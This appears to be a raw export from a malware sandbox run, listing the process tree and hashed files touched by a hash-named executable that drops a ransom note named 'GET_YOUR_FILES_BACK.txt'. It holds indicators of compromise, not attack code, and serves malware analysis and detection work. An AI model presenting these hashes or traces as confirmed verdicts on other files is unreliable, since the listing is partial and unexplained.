"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=3248 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4968 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5668 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5048 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4c4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\advancedrun-x64\" -spe -an -ai#7zMap21697:92:7zEvent13707

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe

"C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe"

C:\Windows\system32\cmd.exe

"cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault037237eah27e8h403chbb49haa253b5c0bb1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc

C:\Windows\system32\cmd.exe

"cmd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5824 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=1672 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2252 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1384 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2296 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE

"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 2792

Network

Country Destination Domain Proto

Files

SHA1 2c6ebb298f9a803b13b5f331cb0c80a67e62800b
SHA256 b19e75a60a66cd18041a3588924564f99496c7c04f4fcc0305e25f5aadbffe6f
SHA512 ae4bb421c54fb6aa82116e3147cd97db8d7af9a584eae2299e1c90d56c532a133ee7cfe09b0fe69443c5f6ffc74ca57d2d75fc3501dcfd675f371c607a9afdec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 1814b1a76e2dd327e186a9e10f25e9f2
SHA1 9eceb52d957c6807ce1193305576c884a1d018fd
SHA256 5f6a722ea700735943c4915d394537377bd94702def9b0557b5d7b441699ba34
SHA512 3f438a00570aa5d5cf6a3ebd36ed982c1cbf219dc534c31f1ecaa783937dfbff3a47f92641870d27f7e3727abaa10510771d2b2dd1f169d9e2688328636bd392

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6be0dfbed718555909fba846f1756019
SHA1 8cfdcd9877f4b0c1a115441bf4f6c37971f5fc0f
SHA256 82539b47ba446272f0f83a27d55ac2704d451b753192d1d7e3dd0a01cc5c02bb
SHA512 c0f3f73575cbb83a309486701ad9e6d1b3a5a1b675c71073b36dcb894cb10aa24f8cf7383e8840e5723a3e9af4662bccbf0dc3802e809c373d73d350924e1593

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 bcce2295c49065f3f92860fb176b93e7
SHA1 80f45a10182a1a98876e0001612ad292b4bf4ff0
SHA256 392a6d99b52657235b3f42086c2e289fe7e3a74f9d4ca7fa78a2cc4ef83f2b3e
SHA512 167c7e076850f5d09330af00aca5a8204f09a1810ef1282a1dc1dcf1a512747c4077519658f2ca4e189ca5dd84da093fbb9d6481c3fa817d8e4f545bd1e402e5

C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js

MD5 68de20eb910a17ccdb1b6c37ac214491
SHA1 4db1e2812bca58b73b4a9162c2fe5f8df8fc2a78
SHA256 3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b
SHA512 63666ae7a9536624c16975a8ad4b190f62439f79c1232f0dbea73436b432e949627402f26dc0167a5a0caad2f56122a761b4fca4cc81c6e5ca84cd4e85537fbf

memory/748-1297-0x00000249DBB30000-0x00000249DBBB6000-memory.dmp

memory/748-1298-0x00000249DBAB0000-0x00000249DBAD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ody2d2nm.sd2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-1308-0x00000249DBAA0000-0x00000249DBAB0000-memory.dmp

memory/748-1309-0x00000249DC140000-0x00000249DC244000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 e2b9a8a87d399390313b2199a819a83a
SHA1 56a3ccae4a62894736f35af725d225100899d880
SHA256 e697a5a3ce732b19e5e0ba04f611cdc10c2fb57e5430f085dad84c355fe0a413
SHA512 6670fcf190116579522580e06dff54b08969260ee763393a628b5821e287aa29d6efda073323d8f9617b665b73e8d81e73b138b84cff59a8fa989a4dfa766757

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 3fbeea9f091e4b3bc908b3925ca5438e
SHA1 095333dbb7a35b2285b040f55e986df040d2f303
SHA256 4f711b97a0691eeaf576bcea3bd19a90415e0c15b82118bc2db987a900656c97
SHA512 5c75a463f4f1dbf19de69e69aa4ccf5f2fe5f75426e07275da395763fc044f86bcc58a6e9daaca1e7eb06c5bb81ab08b44bdb67c3ec166808d63f6549741f163

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 be2c4b555771e268c716473487bd9a48
SHA1 8850b159034a7f7dce9bcde643b6d2c30b721ad0
SHA256 3974fe1a2c2fe8d4b323d7149b20bff28d5e5cf8673780f3d7ee9a4ab8f68b89
SHA512 c7009c309660e1b41eb5b2b46bce1884f5c66c067e7dbb9aeb376201ddb55511b7af002e2f1d9c62dacce69235185de64cf0df071c873b702337037731a4d0bb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1e5ccc04862d8ddb20432938d8b6e7f0
SHA1 695774ecdaf859bfa3d91a0b3cc3057401f9a7bd
SHA256 8a96e951921a1d11a4ff2e4cb52cb29f702c01b3556c7e12f74ce1be1f4c212e
SHA512 309250b47af9538bdf1edbfc7fb6da39adf1086344ade5b942b0f33db40462e8f6e0a99ffe18d7f88d53a005de65f935f78cf44be98836859490c28245aafd9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00005e

MD5 0d95c31b8f8a4d385452bb1b5853361b
SHA1 3242b32a86ff8b2e8f84e6832e678b391aad3113
SHA256 362b43015a87a4822beccbe08695a810f64ad14f45b3828e744879c5dd519774
SHA512 16e3b9877ce4eece7260c12d7f1d48524c5d99e05e9a5238328595833a0078da48d7bd06bc0057827268f29857c0105f4bbd0e4daa68d53ba3b44f452c7f9780

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4f3518d6506c3ede44b59e3015b8d81e
SHA1 d7da774b260750085b67921e2169e6d7ac292429
SHA256 db51fab249231b3df069647ff68e454d1b2169d98083fddd74b4e672225210e2
SHA512 40f7a760e2dfa88a5b2a2a39bf0f8ac0cab7d3b8db4a6db4b6e89ae1b9ede94a33973ca79e962dc5fe627735fdfcc30821aa979562100d3026ec22039bfb9976

memory/748-1567-0x00000249DC080000-0x00000249DC0C2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 6e07e11b139b52029f2dc9d98d53d4fc
SHA1 5b6a374e7fd8ebdcfa77f04c7e35f69c05ea8833
SHA256 7211f1a6496e949bc908846c123ad5060fa87f11e177247e29f61ecee1ca12b2
SHA512 638517879b15b631d123b588b035917b549a7192b6079a7387ef47a657d60391c50f1da07cf3ac2b58b203ae8a0147ec38a4287760c3b58f3b280f10522e1417

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b66db53846de4860ca72a3e59b38c544
SHA1 2202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256 b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA512 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 59caf463592589b71a93e85c9def60fa
SHA1 1503967b4dfef2a43ec18f294f2ef73afd2fa841
SHA256 70b5963362d9a81c469339e6243e51563ed3829043e959f1517430c09ad084b9
SHA512 4598ace8040d57bdcc1b8db96cf53e79b61cb14217dc0ca18e173ea2236ba0f9ce445e31af9c40721414a61baa712d145cbe12def60c1bbfc3a0fe6389d738d3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 984c94156f8a8cd5443a7e205d6b3b67
SHA1 f915c8218b9346154f7bba4decd65d122e90b52a
SHA256 5d205bdde381b3ddb87d394ed0d20c4f0cd2906be953cbf041733bdbd0712b50
SHA512 9e731d762f4e1445cf3b5f856986c4f8d6a0d23a7ef0b339f1d6581a16edd0cb04f5a9d6294115a1e33e6c94784cf9d950a2a9f1573bfb8d62dbd19581dc4531

C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.zip

MD5 ba1a2eda89a58c436e2157f786c76f52
SHA1 49b67ff45e993e0f3e33729094185fa40f451ae4
SHA256 dd06d606db9b289b1f81a7c6813f7b0905ee9f749ba10c875506e24fa9691019
SHA512 4333c70d5166240248a037d9378b0e66ca6f09621b0b02db1211578a0cea43db1bc6aff8f84628c07fd7511713777350cadf625c7f06205b8afe75add7514cfa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 04d0caf722f5ecfc15b703725f999f17
SHA1 41aa78195a8d882638ae52b02d4930cf6b773045
SHA256 e7afb33e77a97c260bdfc3866ed00474508728cc52692c403a802d308f5ffe15
SHA512 bdb240eb3d5d6cbec1563a8dbfaf73259891fd8a3e13fd358df2fa521fc99acd9c3795f6314b0fdde4d46e2b4c80a30a01642b1a050fa4da0cf60b60fba56674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5eb6edeb6f0e403bb514c7aa6010654d
SHA1 9d3012ba947590841c231ce00abf387b7a34c152
SHA256 d8f9c6d3558d297f46767b2751a04e4bc921a703dfe79698d7883f23021ac481
SHA512 68aeb069214366dbb8156d0e0cd88868aa7b5df0d8ec7dad079970d6b069142238641ff69132d82ea4206a44038568e29fffe2fa738afca9e5f7bd6576833264

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 abc27673d9c940ad74b41c58391d2412
SHA1 9a31a521a521dcd0f974ce6f7a50aecc69a50df0
SHA256 cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
SHA512 c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe

MD5 76e177a94834b3f7c63257bc8011f60f
SHA1 e2bdef45d8dd4b1811396781b0bc94092d268a88
SHA256 fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f
SHA512 d5bd1f1854f2b7a589c0d9a4f57df30a03c92250f400bb3868facdeca5dcee6f9ee3a72653640a2f2bdafebce3e4db0fe322bfad5045741c43784bc94ef39418

C:\Recovery\GET_YOUR_FILES_BACK.txt

MD5 5f379e8e4834e0318a4d32cc0694c25e
SHA1 46a05816fa412f576c695f33e1c876287e2cc939
SHA256 daafd23150d97b38e7478711b69934e662d532083ba10392b5329c4829330eb5
SHA512 23873cebede58ae7264f07634f1131a40a0766e5b65a138e0bc0d2141f5929b89c158b251c1215f08d06caf8c7f20b7a575d32855c0a30a8c201f09e756ebaa8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 12092736357e6d2e87e1e0c3589f9189
SHA1 df2a00c4a49956c21e336451d5c372bc97bbb2df
SHA256 d723835e8d01e5865d0b6521b981bab697617f7f11a481c45f7832b8cb9d64a7
SHA512 aa74b9aff6f7ed231086687a7d24e13e5e3148e844e98a2520810854692aa115210b767bd6bcd597ccee0c56701025b06860a0d61b1be935efb03d76d2e31504

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 94f8fafdce1b3afc920a3e75c54363ff
SHA1 04fad7528e6d562e7e9946bb52bc25765c09a5d6
SHA256 138829c68abc9fffe52d8f0dba7e6a5f0b923894b003a8f685e8e39410890afa
SHA512 95488026d5d034b60d27950b9ad0083be7fad1a3749abaad461c85addbd7cdc48be0e8f51ab5121200c7372e78a5d75bd1a06b4c7376ed5c1f2df2764d67528f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\51625d22-4c49-42d7-b249-9e21209ad0ed.tmp

MD5 dc53ed1fba6f9637c6956ce107d79cee
SHA1 8c9fef9edbfff5d5f1087a5eb2203b9439834178
SHA256 74a5bd29d07605a18173b64e12d0850ffac8fd8a662998752e6a6a649b12cf3e
SHA512 fdf16bec29791e08c8c8dfdd1f2ab3ae780be08854567976c54738f685f65cf42bf46e0580ec535cfd55b1f4e38d78449cee83efee7d073f687b51c38558e290

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

MD5 921df38cecd4019512bbc90523bd5df5
SHA1 5bf380ffb3a385b734b70486afcfc493462eceec
SHA256 83289571497cbf2f2859d8308982493a9c92baa23bebfb41ceed584e3a6f8f3f
SHA512 35fa5f8559570af719f8a56854d6184daa7ef218d38c257e1ad71209272d37355e9ad93aaa9fbe7e3b0a9b8b46dfc9085879b01ce7bb86dd9308d4a6f35f09e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

MD5 15b07d0834be5ce9e1fa1265079859a1
SHA1 9aae71abb06cd4554a594f88b09f52f6629ffdc8
SHA256 870ca3db53a1372427fe59c45385d6ab7916ce1cfe21ddd48bc6631e45318f73
SHA512 36d2fddbcc3c5322ed37e5c8c8292b9a52c96ac2c301776b5dad08eb8e4c80f5f565c850cb5cb70498565903c3828c0ff1f4620f33540fe645e58ce258579449

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 4392f4aa5f9d368e8d3ae01f401f1fe4
SHA1 f50229132f14636538cd0af8da2e282bf3899c07
SHA256 401775c120db5f1ba733a35e9dd144011a3d438745b1fdf42166b1c192615726
SHA512 b276167a919f54478ed7e34d573a7c521defe05227ca03a200b28c2ce8ff482c817db99a7e1e223fea2cb0198834b180d60d95f8ff3613f248bff9496683dad7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\457f80d6414f3757_0

MD5 279846a8f645c81fe62a90e8728cd6d0
SHA1 7302ab24e21da8483578b7c794cf6d8d2f407d2b
SHA256 0c8691fa1422ad1368310d04c3df42294a11a51cfa779249a0a9b6e59e4ff657
SHA512 f963394c9a8d50b1326bc6d5c7600153addd696215be422eb1313919adca3b9b398d3f60a208ce28804b3ac675c331f497febd61a8fae6d1454451c24ad6ec81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b7e7e455dd742cfd_0

MD5 7a21e68810b8705f5430b68c5d45b93a
SHA1 4d4713deb25330122f630d9bd5e4c0cec6bf7aae
SHA256 b6516e0a414a75e3b3b0132979ddac5d304928f98064b8f7d6e08f00b6617d4b
SHA512 0003daf13ef3a80aed674396bfba3d12e2d0d1a5696b9bafecfca76599d20211bfad793e9e6ad1297ec77a332cbe4962cf1092b58f636eea28fb2c114968d132

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\d0d940bc3a48d4e5_0

MD5 8922395c5855db12825e4b8de64917a1
SHA1 2f2283565b4c3ddb7c6d4a13643cafd5f4c66f11
SHA256 734bf03db59cf2b8951ef46f7866f950917d3a612067a64eaa06c2d630631c13
SHA512 e1727438aa54f84984a612b9a919caafdba861cef9a1c1db5fda4a8b889de57a8e370e454c8a7c7260f9251077b19887f61bfa0bd91884a859030d3d600e8c02

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 32675d55c6c13b9830d42ac769f7663e
SHA1 54e70d838e515eba5f6b469d4cb5d8132b980f08
SHA256 747a5512ce5c8663769a0bef42cbdd2619b946199973540c5aff347c049a940a
SHA512 2ac0286a4c5df5a4b1fae500f1c8bdf3f65194ee7741846b6b2c489076401fde5c3ca5f77ba776b2a46d76731700ef1b138b7e3a345c19696630bc21f1e92b09

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 89616066bb4b51b4f36f260fa6c9a4ef
SHA1 2473ec897cdf5ee253f3c9fcc365181792bcf06c
